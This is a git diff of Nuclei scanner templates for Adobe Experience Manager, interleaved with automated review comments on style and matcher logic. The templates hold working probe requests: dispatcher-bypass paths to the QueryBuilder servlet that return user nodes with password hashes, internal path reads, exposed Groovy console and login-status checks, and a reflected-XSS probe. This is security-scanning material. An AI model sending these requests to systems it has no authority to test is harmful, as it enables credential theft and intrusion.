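Review bot: The `reference` in aem-gql-servlet-147.yaml is a scalar while the other hunks in this commit (aem-merge-metadata-servlet, aem-wcm-suggestions-servlet, aem-querybuilder-feed-servlet-175) move references to list form; write it as `reference:` followed by `  - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html`. The word matcher also relies on the short tokens `path` and `hits`, which are far less specific than `excerpt`; stating `part: body` explicitly, as the groovyconsole template in this commit does, would at least keep the match off the headers.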
@@ -1,56 +0,0 @@ -id: aem-gql-servlet - -info: - name: AEM GQLServlet - author: dhiyaneshDk,prettyboyaaditya - severity: low - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/reference-materials/javadoc/index.html?org/apache/jackrabbit/commons/query/GQL.html - tags: aem - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:User%20limit:..1&pathPrefix=&p.ico' - - '{{BaseURL}}/bin/wcm/search/gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.1.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}/bin/wcm/search/gql.json/a.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.servlet.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.1.json?query=type:base%20limit:..1&pathPrefix=' - - 
'{{BaseURL}}///bin///wcm///search///gql.json///a.4.2.1...json?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.html?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json;%0aa.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.css?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.ico?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.png?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.js?query=type:base%20limit:..1&pathPrefix=' - - '{{BaseURL}}///bin///wcm///search///gql.json///a.html?query=type:base%20limit:..1&pathPrefix=' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'excerpt' - - 'path' - - 'hits' - condition: and diff --git a/nuclei-templates/Other/aem-groovyconsole-153.yaml b/nuclei-templates/Other/aem-groovyconsole-153.yaml deleted file mode 100644 index 9709becc71..0000000000 --- a/nuclei-templates/Other/aem-groovyconsole-153.yaml +++ /dev/null 
@@ -1,39 +0,0 @@ -id: aem-groovyconsole - -info: - name: AEM Groovy console enabled - author: x86rd - severity: critical - description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 - tags: aem - -requests: - - method: GET - path: - - "{{BaseURL}}/groovyconsole" - - "{{BaseURL}}/api/groovyconsole" - - "{{BaseURL}}/aem/groovyconsole" - - "{{BaseURL}}/app/groovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/..%2f..%2f..%2fapi/groovyconsole" - - "{{BaseURL}}/aem/..%2f..%2f..%2fgroovyconsole" - - "{{BaseURL}}/app/..%2f..%2f..%2fgroovyconsole" - - headers: - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9,hi;q=0.8 - User-Agent: Mozilla/5.0 (Linux; Android 6.0; Nexus 5 Build/MRA58N) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Mobile Safari/537.36 - - matchers-condition: and - matchers: - - type: word - words: - - "Groovy Console" - - "Run Script" - - "Groovy Web Console" - part: body - condition: and - - type: status - status: - - 200 \ No newline at end of file diff --git a/nuclei-templates/Other/aem-groovyconsole-155.yaml b/nuclei-templates/Other/aem-groovyconsole-155.yaml new file mode 100644 index 0000000000..a2a388a6ec --- /dev/null +++ b/nuclei-templates/Other/aem-groovyconsole-155.yaml 
@@ -0,0 +1,35 @@
+id: aem-groovyconsole
+
+info:
+ name: AEM Groovy console enabled
+ author: Dheerajmadhukar
+ severity: critical
+ description: Groovy console is exposed, RCE is possible.
+ reference:
+ - https://hackerone.com/reports/672243
+ - https://twitter.com/XHackerx007/status/1435139576314671105
+ tags: aem
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/groovyconsole"
+ - "{{BaseURL}}/etc/groovyconsole.html"
+ headers:
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+ Accept-Language: en-US,en;q=0.9,hi;q=0.8
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: word
+ words:
+ - "Groovy Console"
+ - "Run Script"
+ - "Groovy Web Console"
+ part: body
+ condition: and
+
+ - type: status
+ status:
+ - 200
\ No newline at end of file
diff --git a/nuclei-templates/Other/aem-hash-querybuilder-157.yaml b/nuclei-templates/Other/aem-hash-querybuilder-157.yaml
new file mode 100644
index 0000000000..50ae6efbd4
--- /dev/null
+++ b/nuclei-templates/Other/aem-hash-querybuilder-157.yaml
@@ -0,0 +1,29 @@
+id: aem-hash-querybuilder
+
+info:
+ author: DhiyaneshDk
+ name: Query hashed password via QueryBuilder Servlet
+ severity: medium
+ reference: https://twitter.com/AEMSecurity/status/1372392101829349376
+ tags: aem
+
+requests:
+ - raw:
+ - |
+ GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"success":true'
+ - 'rep:password'
+ condition: and
\ No newline at end of file
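Review bot: aem-groovyconsole-155.yaml ends without a trailing newline (`\ No newline at end of file` after `- 200`), unlike most templates added in this commit; the same applies to aem-hash-querybuilder-157.yaml and aem-querybuilder-feed-servlet-175.yaml. Terminate the last line with a newline so later edits do not show up as spurious whole-line changes. The `critical` severity with the three-word `condition: and` body match is reasonable, since a page must contain all of "Groovy Console", "Run Script" and "Groovy Web Console" to fire.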
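Review bot: aem-hash-querybuilder-157.yaml has no `description`, while the sibling templates added here (aem-login-status-170, aem-userinfo-servlet-193, aem-querybuilder-json-servlet-186) carry one, and the name alone does not say what a hit means for the owner. Add something like `description: QueryBuilder servlet is reachable through a dispatcher selector bypass; full hits on rep:User nodes can expose rep:password hashes.` The raw request is byte-identical to the one in the new aem-jcr-querybuilder.yaml, so a scan sends it twice per host; consider merging the two word matchers into one template.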
diff --git a/nuclei-templates/Other/aem-hash-querybuilder-159.yaml b/nuclei-templates/Other/aem-hash-querybuilder-159.yaml deleted file mode 100644 index ef0fc018a1..0000000000 --- a/nuclei-templates/Other/aem-hash-querybuilder-159.yaml +++ /dev/null @@ -1,28 +0,0 @@ -id: aem-hash-querybuilder -info: - author: DhiyaneshDk - name: Query hashed password via QueryBuilder Servlet - severity: medium - reference: https://twitter.com/AEMSecurity/status/1372392101829349376 - tags: aem -requests: - - raw: - - | - GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Accept-Encoding: gzip, deflate - Connection: close - Upgrade-Insecure-Requests: 1 - Cache-Control: max-age=0 - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - '"success":true' - - 'rep:password' diff --git a/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml b/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml deleted file mode 100644 index 3dfcd291c4..0000000000 --- a/nuclei-templates/Other/aem-jcr-querybuilder-162.yaml +++ /dev/null 
@@ -1,31 +0,0 @@
-id: aem-jcr-querybuilder
-
-info:
- author: DhiyaneshDk
- name: Query JCR role via QueryBuilder Servlet
- severity: info
- tags: aem
-
-requests:
- - raw:
- - |
- GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
- Host: {{Hostname}}
- User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
- Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
- Accept-Language: en-US,en;q=0.5
- Accept-Encoding: gzip, deflate
- Connection: close
- Upgrade-Insecure-Requests: 1
- Cache-Control: max-age=0
-
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - '"success":true'
- - 'jcr:uuid'
\ No newline at end of file
diff --git a/nuclei-templates/Other/aem-jcr-querybuilder.yaml b/nuclei-templates/Other/aem-jcr-querybuilder.yaml
new file mode 100644
index 0000000000..15a5d6c4d4
--- /dev/null
+++ b/nuclei-templates/Other/aem-jcr-querybuilder.yaml
@@ -0,0 +1,28 @@
+id: aem-jcr-querybuilder
+
+info:
+ name: Query JCR role via QueryBuilder Servlet
+ author: DhiyaneshDk
+ severity: info
+ tags: aem
+
+requests:
+ - raw:
+ - |
+ GET /bin/querybuilder.json.;%0aa.css?p.hits=full&property=rep:authorizableId&type=rep:User HTTP/1.1
+ Host: {{Hostname}}
+ Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+ Accept-Language: en-US,en;q=0.5
+ Accept-Encoding: gzip, deflate
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - '"success":true'
+ - 'jcr:uuid'
+ condition: and
\ No newline at end of file
diff --git a/nuclei-templates/Other/aem-login-status-170.yaml b/nuclei-templates/Other/aem-login-status-170.yaml
new file mode 100644
index 0000000000..7a9051e7ef
--- /dev/null
+++ b/nuclei-templates/Other/aem-login-status-170.yaml
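Review bot: The raw request in the new aem-jcr-querybuilder.yaml is the same as the one in aem-hash-querybuilder-157.yaml (same path, same `property=rep:authorizableId&type=rep:User` query), so the only difference between the two templates is the matched word, `jcr:uuid` here and `rep:password` there. Either fold this into the other template as a second word matcher or change the query so that the `jcr:uuid` match actually reflects the "JCR role" the name claims. A `description` is also missing, so a reader cannot tell from the file what distinguishes an `info` hit here from the `medium` hit of the other template.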
@@ -0,0 +1,29 @@
+id: aem-login-status
+
+info:
+ name: AEM Login Status
+ author: DhiyaneshDk
+ severity: info
+ description: LoginStatusServlet is exposed, it allows to bruteforce credentials.
+ reference:
+ - https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
+ - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/LoginStatusServletExposed.java
+ tags: aem,adobe
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/system/sling/loginstatus'
+ - '{{BaseURL}}/system/sling/loginstatus.css'
+ - '{{BaseURL}}///system///sling///loginstatus'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - 'CREDENTIAL_CHALLENGE'
diff --git a/nuclei-templates/Other/aem-login-status.yaml b/nuclei-templates/Other/aem-login-status.yaml
deleted file mode 100644
index d8446f7869..0000000000
--- a/nuclei-templates/Other/aem-login-status.yaml
+++ /dev/null
@@ -1,24 +0,0 @@
-id: aem-login-status
-
-info:
- author: DhiyaneshDk
- name: AEM Login Status
- severity: info
- reference: https://www.slideshare.net/0ang3el/hunting-for-security-bugs-in-aem-webapps-129262212
- tags: aem
-
-
-requests:
- - method: GET
- path:
- - '{{BaseURL}}/system/sling/loginstatus.css'
- matchers-condition: and
- matchers:
- - type: status
- status:
- - 200
-
- - type: word
- words:
- - 'CREDENTIAL_CHALLENGE'
- condition: and
diff --git a/nuclei-templates/Other/aem-merge-metadata-servlet.yaml b/nuclei-templates/Other/aem-merge-metadata-servlet.yaml
index 0f174a63fe..94bdc1a137 100644
--- a/nuclei-templates/Other/aem-merge-metadata-servlet.yaml
+++ b/nuclei-templates/Other/aem-merge-metadata-servlet.yaml
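Review bot: The description in aem-login-status-170.yaml, `LoginStatusServlet is exposed, it allows to bruteforce credentials.`, is a comma splice with a missing object; suggest `description: LoginStatusServlet is exposed; it can be used to check credentials without rate limiting.` The `CREDENTIAL_CHALLENGE` word matcher has no `part`, so it defaults to the body; stating `part: body` explicitly matches the style of aem-userinfo-servlet-193 in the same commit.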
@@ -1,13 +1,13 @@ id: aem-merge-metadata-servlet info: - author: DhiyaneshDk name: AEM MergeMetadataServlet + author: DhiyaneshDk severity: info - reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 + reference: + - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 tags: aem - requests: - method: GET path: diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml b/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml new file mode 100644 index 0000000000..b180cc6888 --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-feed-servlet-175.yaml @@ -0,0 +1,23 @@ +id: aem-querybuilder-feed-servlet + +info: + name: AEM QueryBuilder Feed Servlet + author: DhiyaneshDk + severity: info + reference: + - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html + tags: aem + +requests: + - method: GET + path: + - '{{BaseURL}}/bin/querybuilder.feed' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - 'CQ Feed' \ No newline at end of file diff --git a/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml b/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml deleted file mode 100644 index 4f840f4bca..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-feed-servlet-177.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: aem-querybuilder-feed-servlet - -info: - author: DhiyaneshDk - name: AEM QueryBuilder Feed Servlet - severity: info - reference: https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - tags: aem - - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.feed' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - 'CQ Feed' \ No newline at end of file 
diff --git a/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml b/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml
new file mode 100644
index 0000000000..4aca466e0e
--- /dev/null
+++ b/nuclei-templates/Other/aem-querybuilder-internal-path-read-179.yaml
@@ -0,0 +1,25 @@
+id: aem-querybuilder-internal-path-read
+info:
+ author: DhiyaneshDk
+ name: AEM QueryBuilder Internal Path Read
+ severity: medium
+ reference: https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91
+ tags: aem
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1'
+ - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1'
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - 'jcr:path'
+ - 'success'
+ condition: and
diff --git a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml b/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml
deleted file mode 100644
index 6814086d48..0000000000
--- a/nuclei-templates/Other/aem-querybuilder-internal-path-read.yaml
+++ /dev/null
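Review bot: The word matcher in aem-querybuilder-internal-path-read-179.yaml uses the bare token `'success'`, which a body containing `"success":false` would also satisfy, whereas aem-hash-querybuilder-157 and aem-jcr-querybuilder in this commit match `'"success":true'`; use `- '"success":true'` here as well. The `reference` is also written as a scalar while the file this replaces (and the aem-merge-metadata-servlet hunk) use list form, so the change regresses the documentation style.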
@@ -1,26 +0,0 @@ -id: aem-querybuilder-internal-path-read -info: - name: AEM QueryBuilder Internal Path Read - author: DhiyaneshDk - severity: medium - reference: - - https://speakerdeck.com/0ang3el/aem-hacker-approaching-adobe-experience-manager-webapps-in-bug-bounty-programs?slide=91 - tags: aem -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.;%0aa.css?path=/etc&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/home&p.hits=full&p.limit=-1' - - '{{BaseURL}}/bin/querybuilder.json.css?path=/etc&p.hits=full&p.limit=-1' - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - 'jcr:path' - - 'success' - condition: and diff --git a/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml b/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml deleted file mode 100644 index 25de00970e..0000000000 --- a/nuclei-templates/Other/aem-querybuilder-json-servlet-185.yaml +++ /dev/null 
@@ -1,41 +0,0 @@ -id: aem-querybuilder-json-servlet - -info: - name: AEM QueryBuilder Json Servlet - author: DhiyaneshDk - severity: info - description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet. - reference: - - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java - tags: aem,adobe - -requests: - - method: GET - path: - - '{{BaseURL}}/bin/querybuilder.json' - - '{{BaseURL}}/bin/querybuilder.json.servlet' - - '{{BaseURL}}///bin///querybuilder.json' - - '{{BaseURL}}///bin///querybuilder.json.servlet' - - '{{BaseURL}}/bin/querybuilder.feed' - - '{{BaseURL}}/bin/querybuilder.feed.servlet' - - '{{BaseURL}}///bin///querybuilder.feed' - - ' {{BaseURL}}///bin///querybuilder.feed.servlet' - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - words: - - "application/json" - part: header - - - type: word - words: - - 'success' - - 'results' - condition: and diff --git a/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml b/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml new file mode 100644 index 0000000000..073fc99968 --- /dev/null +++ b/nuclei-templates/Other/aem-querybuilder-json-servlet-186.yaml 
@@ -0,0 +1,42 @@
+id: aem-querybuilder-json-servlet
+
+info:
+ author: DhiyaneshDk
+ name: AEM QueryBuilder Json Servlet
+ severity: info
+ description: Sensitive information might be exposed via AEMs QueryBuilderServlet or QueryBuilderFeedServlet.
+ reference:
+ - https://helpx.adobe.com/experience-manager/6-3/sites/developing/using/querybuilder-predicate-reference.html
+ - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/dispatcher/QueryBuilderExposed.java
+ tags: aem,adobe
+
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/bin/querybuilder.json'
+ - '{{BaseURL}}/bin/querybuilder.json.servlet'
+ - '{{BaseURL}}///bin///querybuilder.json'
+ - '{{BaseURL}}///bin///querybuilder.json.servlet'
+ - '{{BaseURL}}/bin/querybuilder.feed'
+ - '{{BaseURL}}/bin/querybuilder.feed.servlet'
+ - '{{BaseURL}}///bin///querybuilder.feed'
+ - ' {{BaseURL}}///bin///querybuilder.feed.servlet'
+
+ stop-at-first-match: true
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "application/json"
+ part: header
+
+ - type: word
+ words:
+ - 'success'
+ - 'results'
+ condition: and
diff --git a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml b/nuclei-templates/Other/aem-userinfo-servlet-190.yaml
deleted file mode 100644
index a18d740fa1..0000000000
--- a/nuclei-templates/Other/aem-userinfo-servlet-190.yaml
+++ /dev/null
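Review bot: The last path entry in aem-querybuilder-json-servlet-186.yaml, `' {{BaseURL}}///bin///querybuilder.feed.servlet'`, has a leading space inside the quotes, so the rendered URL would start with a space and that request will most likely fail or be sent mangled; change it to `- '{{BaseURL}}///bin///querybuilder.feed.servlet'`. The same stray space exists in the deleted -185 file, so it was carried over rather than introduced, but the new file is the one that will run.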
@@ -1,32 +0,0 @@ -id: aem-userinfo-servlet - -info: - name: AEM UserInfo Servlet Credentials Exposure - author: DhiyaneshDk - severity: info - description: "Adobe Experience Manager UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node." - tags: aem,bruteforce - -requests: - - method: GET - path: - - '{{BaseURL}}/libs/cq/security/userinfo.json' - matchers-condition: and - matchers: - - type: status - status: - - 200 - - - type: word - part: body - words: - - '"userID":' - - '"userName":' - condition: and - - - type: word - part: header - words: - - 'application/json' - -# Enhanced by mp on 2022/04/05 diff --git a/nuclei-templates/Other/aem-userinfo-servlet-193.yaml b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml new file mode 100644 index 0000000000..01684b7d96 --- /dev/null +++ b/nuclei-templates/Other/aem-userinfo-servlet-193.yaml @@ -0,0 +1,31 @@ +id: aem-userinfo-servlet + +info: + author: DhiyaneshDk + name: AEM UserInfo Servlet + severity: info + description: UserInfoServlet is exposed which allows an attacker to bruteforce credentials. You can get valid usernames from jcr:createdBy, jcr:lastModifiedBy, cq:LastModifiedBy attributes of any JCR node. + tags: aem,bruteforce + + +requests: + - method: GET + path: + - '{{BaseURL}}/libs/cq/security/userinfo.json' + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: body + words: + - '"userID":' + - '"userName":' + condition: and + + - type: word + part: header + words: + - 'application/json' diff --git a/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml b/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml index 009f96d571..00145f1123 100644 --- a/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml +++ b/nuclei-templates/Other/aem-wcm-suggestions-servlet.yaml 
@@ -1,12 +1,13 @@ id: aem-wcm-suggestions-servlet + info: - author: DhiyaneshDk name: AEM WCM Suggestions Servlet + author: DhiyaneshDk severity: low - reference: https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96 + reference: + - https://speakerdeck.com/0ang3el/hunting-for-security-bugs-in-aem-webapps?slide=96 tags: aem - requests: - method: GET path: diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml new file mode 100644 index 0000000000..4480602e2f --- /dev/null +++ b/nuclei-templates/Other/aem-xss-childlist-selector-197.yaml @@ -0,0 +1,32 @@ +id: aem-xss-childlist-selector +info: + name: XSS in childlist selector + author: dhiyaneshDk + severity: medium + description: | + Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. + reference: + - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java + metadata: + shodan-query: + - http.title:"AEM Sign In" + - http.component:"Adobe Experience Manager" + tags: xss,aem,adobe +requests: + - method: GET + path: + - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' + matchers-condition: and + matchers: + - type: word + words: + - '' + - '{"path":"/etc/designs/xh1x.childrenlist.json' + condition: and + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml b/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml deleted file mode 100644 index cc19c4643a..0000000000 --- a/nuclei-templates/Other/aem-xss-childlist-selector-198.yaml +++ /dev/null 
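Review bot: The first word matcher in aem-xss-childlist-selector-197.yaml lists an empty string `''` as a word, which every body satisfies, so under `condition: and` the matcher reduces to the single `{"path":"/etc/designs/xh1x.childrenlist.json` check; the path `/etc/designs/xh1x.childrenlist.json//.html` with nothing between the slashes suggests an HTML fragment was stripped when this diff was rendered, so verify against the source file rather than this view. The same empty word appears in the removed -198 file and in aem-xss-childlist.yaml. The description also reads `can an XSS` where a verb is missing; suggest `can trigger an XSS`.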
@@ -1,30 +0,0 @@ -id: aem-xss-childlist-selector -info: - name: XSS in childlist selector - author: dhiyaneshDk - severity: medium - description: | - Requests using the selector childlist can an XSS when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence the reflected suffix is executed and interpreted in the browser. - reference: - - https://github.com/thomashartm/burp-aem-scanner/blob/master/src/main/java/burp/actions/xss/FlippingTypeWithChildrenlistSelector.java - metadata: - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe -requests: - - method: GET - path: - - '{{BaseURL}}/etc/designs/xh1x.childrenlist.json//.html' - matchers-condition: and - matchers: - - type: word - words: - - '' - - type: word - part: header - words: - - text/html - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aem-xss-childlist.yaml b/nuclei-templates/Other/aem-xss-childlist.yaml deleted file mode 100644 index d4f043e435..0000000000 --- a/nuclei-templates/Other/aem-xss-childlist.yaml +++ /dev/null @@ -1,45 +0,0 @@ -id: aem-xss-childlist - -info: - name: Adobe Experience Manager 'Childlist selector' - Cross-Site Scripting - author: theabhinavgaur - severity: medium - description: | - Adobe Experience Manager contains a cross-site scripting vulnerability via requests using the selector childlist when the dispatcher does not respect the content-type responded by AEM and flips from application/json to text/html. As a consequence, the reflected suffix is executed and interpreted in the browser. - metadata: - verified: true - shodan-query: - - http.title:"AEM Sign In" - - http.component:"Adobe Experience Manager" - tags: xss,aem,adobe - - -http: - - method: GET - path: - - "{{BaseURL}}/{{rand_base(4)}}.childrenlist.html" - - "{{BaseURL}}/{{rand_base(4)}}

please%20authenticate

.childrenlist.html" - - stop-at-first-match: true - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - '

please authenticate

' - condition: or - - - type: word - part: body - words: - - 'data-coral-columnview-id' - - - type: word - part: content_type - words: - - 'text/html' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml b/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml index a0db356bbd..e5641facc7 100644 --- a/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml +++ b/nuclei-templates/Other/aerohive-netconfig-ui-200.yaml 
@@ -1,42 +1,31 @@ -id: aerohive-netconfig-ui - -info: - name: Aerohive NetConfig UI - author: pussycat0x - severity: info - description: An Aerohive NetConfig user interface was detected. The NetConfig UI provides a fundamental set of configurations for configuring basic network and HiveManager connectivity settings, and uploading new IQ Engine images to Extreme Networks APs. - reference: - - https://docs.aerohive.com/330000/docs/help/english/ng/Content/reference/docs/online-help-systems.htm - metadata: - shodan-dork: 'http.title:"Aerohive NetConfig UI"' - tags: panel,tech,hiveos,aerohive - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - "{{BaseURL}}/index.php5" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'Aerohive NetConfig UI' - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'version" align="right" valign="bottom">([0-9.a-z]+)<\/td>' - -# Enhanced by mp on 2022/03/21 +id: aerohive-netconfig-ui +info: + name: Aerohive NetConfig UI + author: pussycat0x + severity: info + metadata: + 